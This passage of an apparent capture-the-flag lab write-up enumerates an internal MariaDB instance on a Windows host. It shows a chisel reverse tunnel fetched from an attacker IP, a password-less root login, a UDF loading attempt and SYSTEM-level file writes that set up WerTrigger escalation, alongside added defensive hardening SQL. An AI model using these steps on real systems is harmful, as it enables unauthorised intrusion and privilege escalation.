MySQL


An internal MySQL instance is listening on port 3306 on the CRAFT2 host. Since it is bound internally only, tunneling is required to reach it.

Tunneling


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ tail /etc/proxychains4.conf -n 2            
socks5 127.0.0.1 48823
#socks5 127.0.0.1 48824

Pointing proxychains at the SOCKS5 proxy that chisel will expose on 127.0.0.1:48823

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ chisel server -p 55555 --reverse --socks5 -v
2025/07/04 20:29:52 server: Reverse tunnelling enabled
2025/07/04 20:29:52 server: Fingerprint tFKGGDEHHZymqMmaZSG5/Ei63sR/3rzZ7/65KNNE9Jw=
2025/07/04 20:29:52 server: Listening on http://0.0.0.0:55555

Starting a chisel server on Kali port 55555 with reverse tunneling and SOCKS5 enabled

PS C:\tmp> curl http://192.168.45.158/chiselx64.exe -OutFile .\chiselx64.exe
PS C:\tmp> Start-Job { & "C:\tmp\chiselx64.exe" client -v --fingerprint "tFKGGDEHHZymqMmaZSG5/Ei63sR/3rzZ7/65KNNE9Jw=" 192.168.45.158:55555 R:48823:socks }
 
Id     Name            PSJobTypeName   State         HasMoreData     Location             Command                  
--     ----            -------------   -----         -----------     --------             -------                  
13     Job13           BackgroundJob   Running       True            localhost             & "C:\tmp\chiselx64.e...

Transferring chisel to the CRAFT2 host and running it as a background job. The client connects back to Kali on port 55555 and opens a reverse SOCKS5 listener on Kali port 48823.

Session established

Authentication


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ proxychains4 -q mysql -h 127.0.0.1 -uroot -p           
Enter password: 
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ proxychains4 -q mysql -h 127.0.0.1 -uroot --skip-ssl
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 16
Server version: 10.4.19-MariaDB mariadb.org binary distribution
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]> 

Successfully authenticated as the root account without a password; by default, the root account does not have one. The --skip-ssl flag is needed because the client insists on TLS by default while this server does not offer it.
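A defender auditing this instance would first enumerate password-less accounts and set passwords on them. The following queries are an added example and are not part of the original write-up; the host values ('localhost', '127.0.0.1', '::1') and the pma host are assumptions, so use the Host column returned by the audit query rather than these literals.

```sql
-- Added example (not from the original write-up): find accounts on this
-- MariaDB 10.4 server that authenticate with no password, then fix them.
-- Host values are assumptions; take the real ones from the audit output.

-- 1. On MariaDB 10.4 mysql.user is a view over mysql.global_priv. The hash
--    lives in Password (mysql_native_password) or authentication_string
--    (other plugins), so an account is password-less when both are empty.
SELECT User, Host, plugin
FROM   mysql.user
WHERE  Password = '' AND authentication_string = '';

-- 2. Set a password on every root row returned above. An XAMPP install
--    usually has root for localhost, 127.0.0.1 and ::1 (assumption).
ALTER USER 'root'@'localhost' IDENTIFIED BY 'Use-A-Long-Random-Passphrase-Here';
ALTER USER 'root'@'127.0.0.1' IDENTIFIED BY 'Use-A-Long-Random-Passphrase-Here';
ALTER USER 'root'@'::1'       IDENTIFIED BY 'Use-A-Long-Random-Passphrase-Here';

-- 3. The phpMyAdmin control user (pma) only needs the phpmyadmin schema.
--    Give it a password as well and confirm it holds no global privileges.
ALTER USER 'pma'@'localhost' IDENTIFIED BY 'Another-Random-Passphrase';
SHOW GRANTS FOR 'pma'@'localhost';

-- 4. Re-run the audit; it should now return an empty set.
SELECT User, Host
FROM   mysql.user
WHERE  Password = '' AND authentication_string = '';
```

One caveat when applying this on an XAMPP host: phpMyAdmin's config.inc.php embeds the root credentials for its default 'config' authentication, so it has to be updated (or switched to cookie authentication) after the root password changes, otherwise phpMyAdmin stops working and the new password ends up stored in a web-readable file anyway.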

Databases


MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| phpmyadmin         |
| test               |
+--------------------+
5 rows in set (0.083 sec)

The phpmyadmin database shows that a phpMyAdmin instance is also present. The test DB is not a default database and is worth inspecting.

test DB


MariaDB [(none)]> SELECT * FROM information_schema.tables WHERE table_schema="test";
Empty set (0.023 sec)

The test DB is empty.

mysql DB


MariaDB [(none)]> SELECT User,Password,Authentication_String FROM mysql.user;
+------+----------+-----------------------+
| User | Password | authentication_string |
+------+----------+-----------------------+
| root |          |                       |
| root |          |                       |
| root |          |                       |
| pma  |          |                       |
+------+----------+-----------------------+
4 rows in set (0.022 sec)

Both the Password and authentication_string columns are empty for all four accounts: no hashes to crack, and every listed account can log in without a password.

phpmyadmin DB


MariaDB [(none)]> SELECT * FROM phpmyadmin.pma__users;
Empty set (0.020 sec)

The phpMyAdmin users table is empty.

Execution (UDF)


MariaDB [(none)]> show variables like '%plugin%';
+-----------------+----------------------------+
| Variable_name   | Value                      |
+-----------------+----------------------------+
| plugin_dir      | C:\xampp\mysql\lib\plugin\ |
| plugin_maturity | gamma                      |
+-----------------+----------------------------+
2 rows in set (0.023 sec)
 
[...REDACTED...]
 
MariaDB [mysql]> CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
ERROR 1126 (HY000): Can't open shared library 'lib_mysqludf_sys_32.dll' (errno: 0, The specified module could not be found.)

Additionally, loading a malicious UDF library is NOT possible:

PS C:\tmp> ls C:\xampp\mysql\lib\plugin\
ls : Cannot find path 'C:\xampp\mysql\lib\plugin\' because it does not exist.
At line:1 char:1
+ ls C:\xampp\mysql\lib\plugin\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\xampp\mysql\lib\plugin\:String) [Get-ChildItem], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

This fails because the directory plugin_dir points to, C:\xampp\mysql\lib\plugin\, does not exist on disk, so the server has nowhere to load a shared library from.

Read / Write


MariaDB [mysql]> SELECT 'hello' INTO OUTFILE 'C://tmp//test.txt';
Query OK, 1 row affected (0.022 sec)
 
MariaDB [mysql]> SELECT LOAD_FILE('C://tmp//test.txt');
+--------------------------------+
| LOAD_FILE('C://tmp//test.txt') |
+--------------------------------+
| hello
                         |
+--------------------------------+
1 row in set (0.022 sec)

Both file read (LOAD_FILE) and file write (INTO OUTFILE) are confirmed, which indicates that secure_file_priv is not confining the server to a dedicated directory.

PS C:\tmp> icacls .\test.txt
.\test.txt NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Administrators:(I)(F)
           BUILTIN\Users:(I)(RX)
 
Successfully processed 1 files; Failed processing 0 files

The file is owned by NT AUTHORITY\SYSTEM, confirming that the MariaDB service runs as SYSTEM. Given that an arbitrary file write as SYSTEM is possible, WerTrigger may be deployed for privilege escalation.
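The UDF attempt and the file read/write above both depend on server settings and privileges that a defender can check and tighten from the same client. The queries below are an added example, not part of the original write-up, covering both the Execution (UDF) and the Read / Write sections; the account host values and the secure_file_priv path are assumptions.

```sql
-- Added example (not from the original write-up): detect and close the
-- file-I/O and UDF exposure on this MariaDB 10.4 instance. Account hosts
-- and the secure_file_priv directory are assumptions.

-- 1. Is file I/O confined? An empty secure_file_priv means INTO OUTFILE and
--    LOAD_FILE can touch any path the service account can reach, which is
--    what made the write to C:\tmp above possible.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 2. Which accounts hold the global FILE privilege those statements need?
SELECT User, Host
FROM   mysql.user
WHERE  File_priv = 'Y';

-- 3. Who could register a UDF at all? CREATE FUNCTION ... SONAME needs
--    INSERT on mysql.func, i.e. a global INSERT or INSERT on the mysql schema.
--    plugin_dir is where the server would look for the library.
SHOW VARIABLES LIKE 'plugin_dir';
SELECT User, Host FROM mysql.user WHERE Insert_priv = 'Y'
UNION
SELECT User, Host FROM mysql.db   WHERE Db = 'mysql' AND Insert_priv = 'Y';

-- 4. Has anything already been registered? A fresh install returns an empty
--    set for both; any row naming an unexpected .dll is a persistence
--    indicator and the file in plugin_dir should be examined.
SELECT name, ret, dl, type FROM mysql.func;
SELECT name, dl            FROM mysql.plugin;

-- 5. Hardening: revoke FILE from every account listed in step 2 that is not
--    a dedicated admin account (pma@localhost is an example; the statement
--    errors harmlessly if that account never held the privilege).
REVOKE FILE ON *.* FROM 'pma'@'localhost';

-- secure_file_priv is read-only at runtime. Restrict it in the [mysqld]
-- section of my.ini and restart the service (assumed path):
--   secure_file_priv = "C:/xampp/mysql/data/import"
-- In MariaDB an empty value means unrestricted, so point it at a dedicated,
-- otherwise empty directory rather than leaving it blank.

-- 6. Re-check after the restart.
SHOW VARIABLES LIKE 'secure_file_priv';
SELECT User, Host FROM mysql.user WHERE File_priv = 'Y';
SELECT name, dl FROM mysql.func;
```

The icacls output above is the other half of the picture: every file the server writes is SYSTEM-owned because the service itself runs as SYSTEM. Running the MariaDB service under a dedicated low-privileged account means that even an unrestricted INTO OUTFILE can only write where that account can, which removes the privileged-write primitive the WerTrigger step relies on.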